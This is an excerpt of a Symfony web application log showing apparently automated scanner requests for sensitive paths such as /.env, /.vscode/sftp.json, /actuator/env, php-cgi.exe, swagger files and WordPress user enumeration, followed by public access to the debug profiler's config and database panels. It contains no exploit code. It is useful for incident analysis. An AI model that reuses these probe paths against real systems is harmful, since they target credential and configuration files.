  787. [2025-12-16 13:24:35] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  788. [2025-12-16 13:24:36] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  789. [2025-12-16 13:24:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  790. [2025-12-16 13:24:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  791. [2025-12-16 13:24:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  792. [2025-12-16 13:24:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  793. [2025-12-16 13:24:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  794. [2025-12-16 13:24:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  795. [2025-12-16 13:24:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  796. [2025-12-16 13:24:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  797. [2025-12-16 13:24:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  798. [2025-12-16 13:24:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  799. [2025-12-16 13:24:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  800. [2025-12-16 13:24:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  801. [2025-12-16 13:24:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  802. [2025-12-16 13:24:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  803. [2025-12-16 13:24:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  804. [2025-12-16 13:24:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  805. [2025-12-16 13:24:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  806. [2025-12-16 13:24:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  807. [2025-12-16 13:24:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  808. [2025-12-16 13:24:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  809. [2025-12-16 13:24:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  810. [2025-12-16 13:24:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  811. [2025-12-16 13:24:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  812. [2025-12-16 13:25:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  813. [2025-12-16 13:25:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  814. [2025-12-16 13:25:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  815. [2025-12-16 13:25:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  816. [2025-12-16 13:25:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  817. [2025-12-16 13:25:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  818. [2025-12-16 13:25:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  819. [2025-12-16 13:25:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  820. [2025-12-16 13:25:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  821. [2025-12-16 13:25:12] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  822. [2025-12-16 13:26:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a2a520?group=1&panel=db","method":"GET"} []
  823. [2025-12-16 13:26:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  824. [2025-12-16 13:28:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb6686","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb6686?panel=cache","method":"GET"} []
  825. [2025-12-16 13:28:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  826. [2025-12-16 13:29:46] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"48ebd7","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/48ebd7/search/results?ip=146.19.24.116&limit=10","method":"GET"} []
  827. [2025-12-16 13:29:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10","method":"GET"} []
  828. [2025-12-16 13:36:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=exception","method":"GET"} []
  829. [2025-12-16 13:36:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  830. [2025-12-16 13:55:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8be61d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8be61d?panel=dump","method":"GET"} []
  831. [2025-12-16 13:55:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  832. [2025-12-16 13:57:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ad45cc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ad45cc?panel=config","method":"GET"} []
  833. [2025-12-16 13:57:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  834. [2025-12-16 14:12:59] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
  835. [2025-12-16 14:12:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  836. [2025-12-16 14:15:58] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  837. [2025-12-16 14:15:59] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  838. [2025-12-16 14:19:16] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  839. [2025-12-16 14:27:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"93e1f8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/93e1f8?panel=config","method":"GET"} []
  840. [2025-12-16 14:27:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  841. [2025-12-16 14:31:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"645f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/645f32?panel=logger","method":"GET"} []
  842. [2025-12-16 14:31:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  843. [2025-12-16 14:31:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a3a56","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7a3a56","method":"GET"} []
  844. [2025-12-16 14:31:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  845. [2025-12-16 14:57:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  846. [2025-12-16 14:57:54] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"132e26","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/132e26/search/results?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
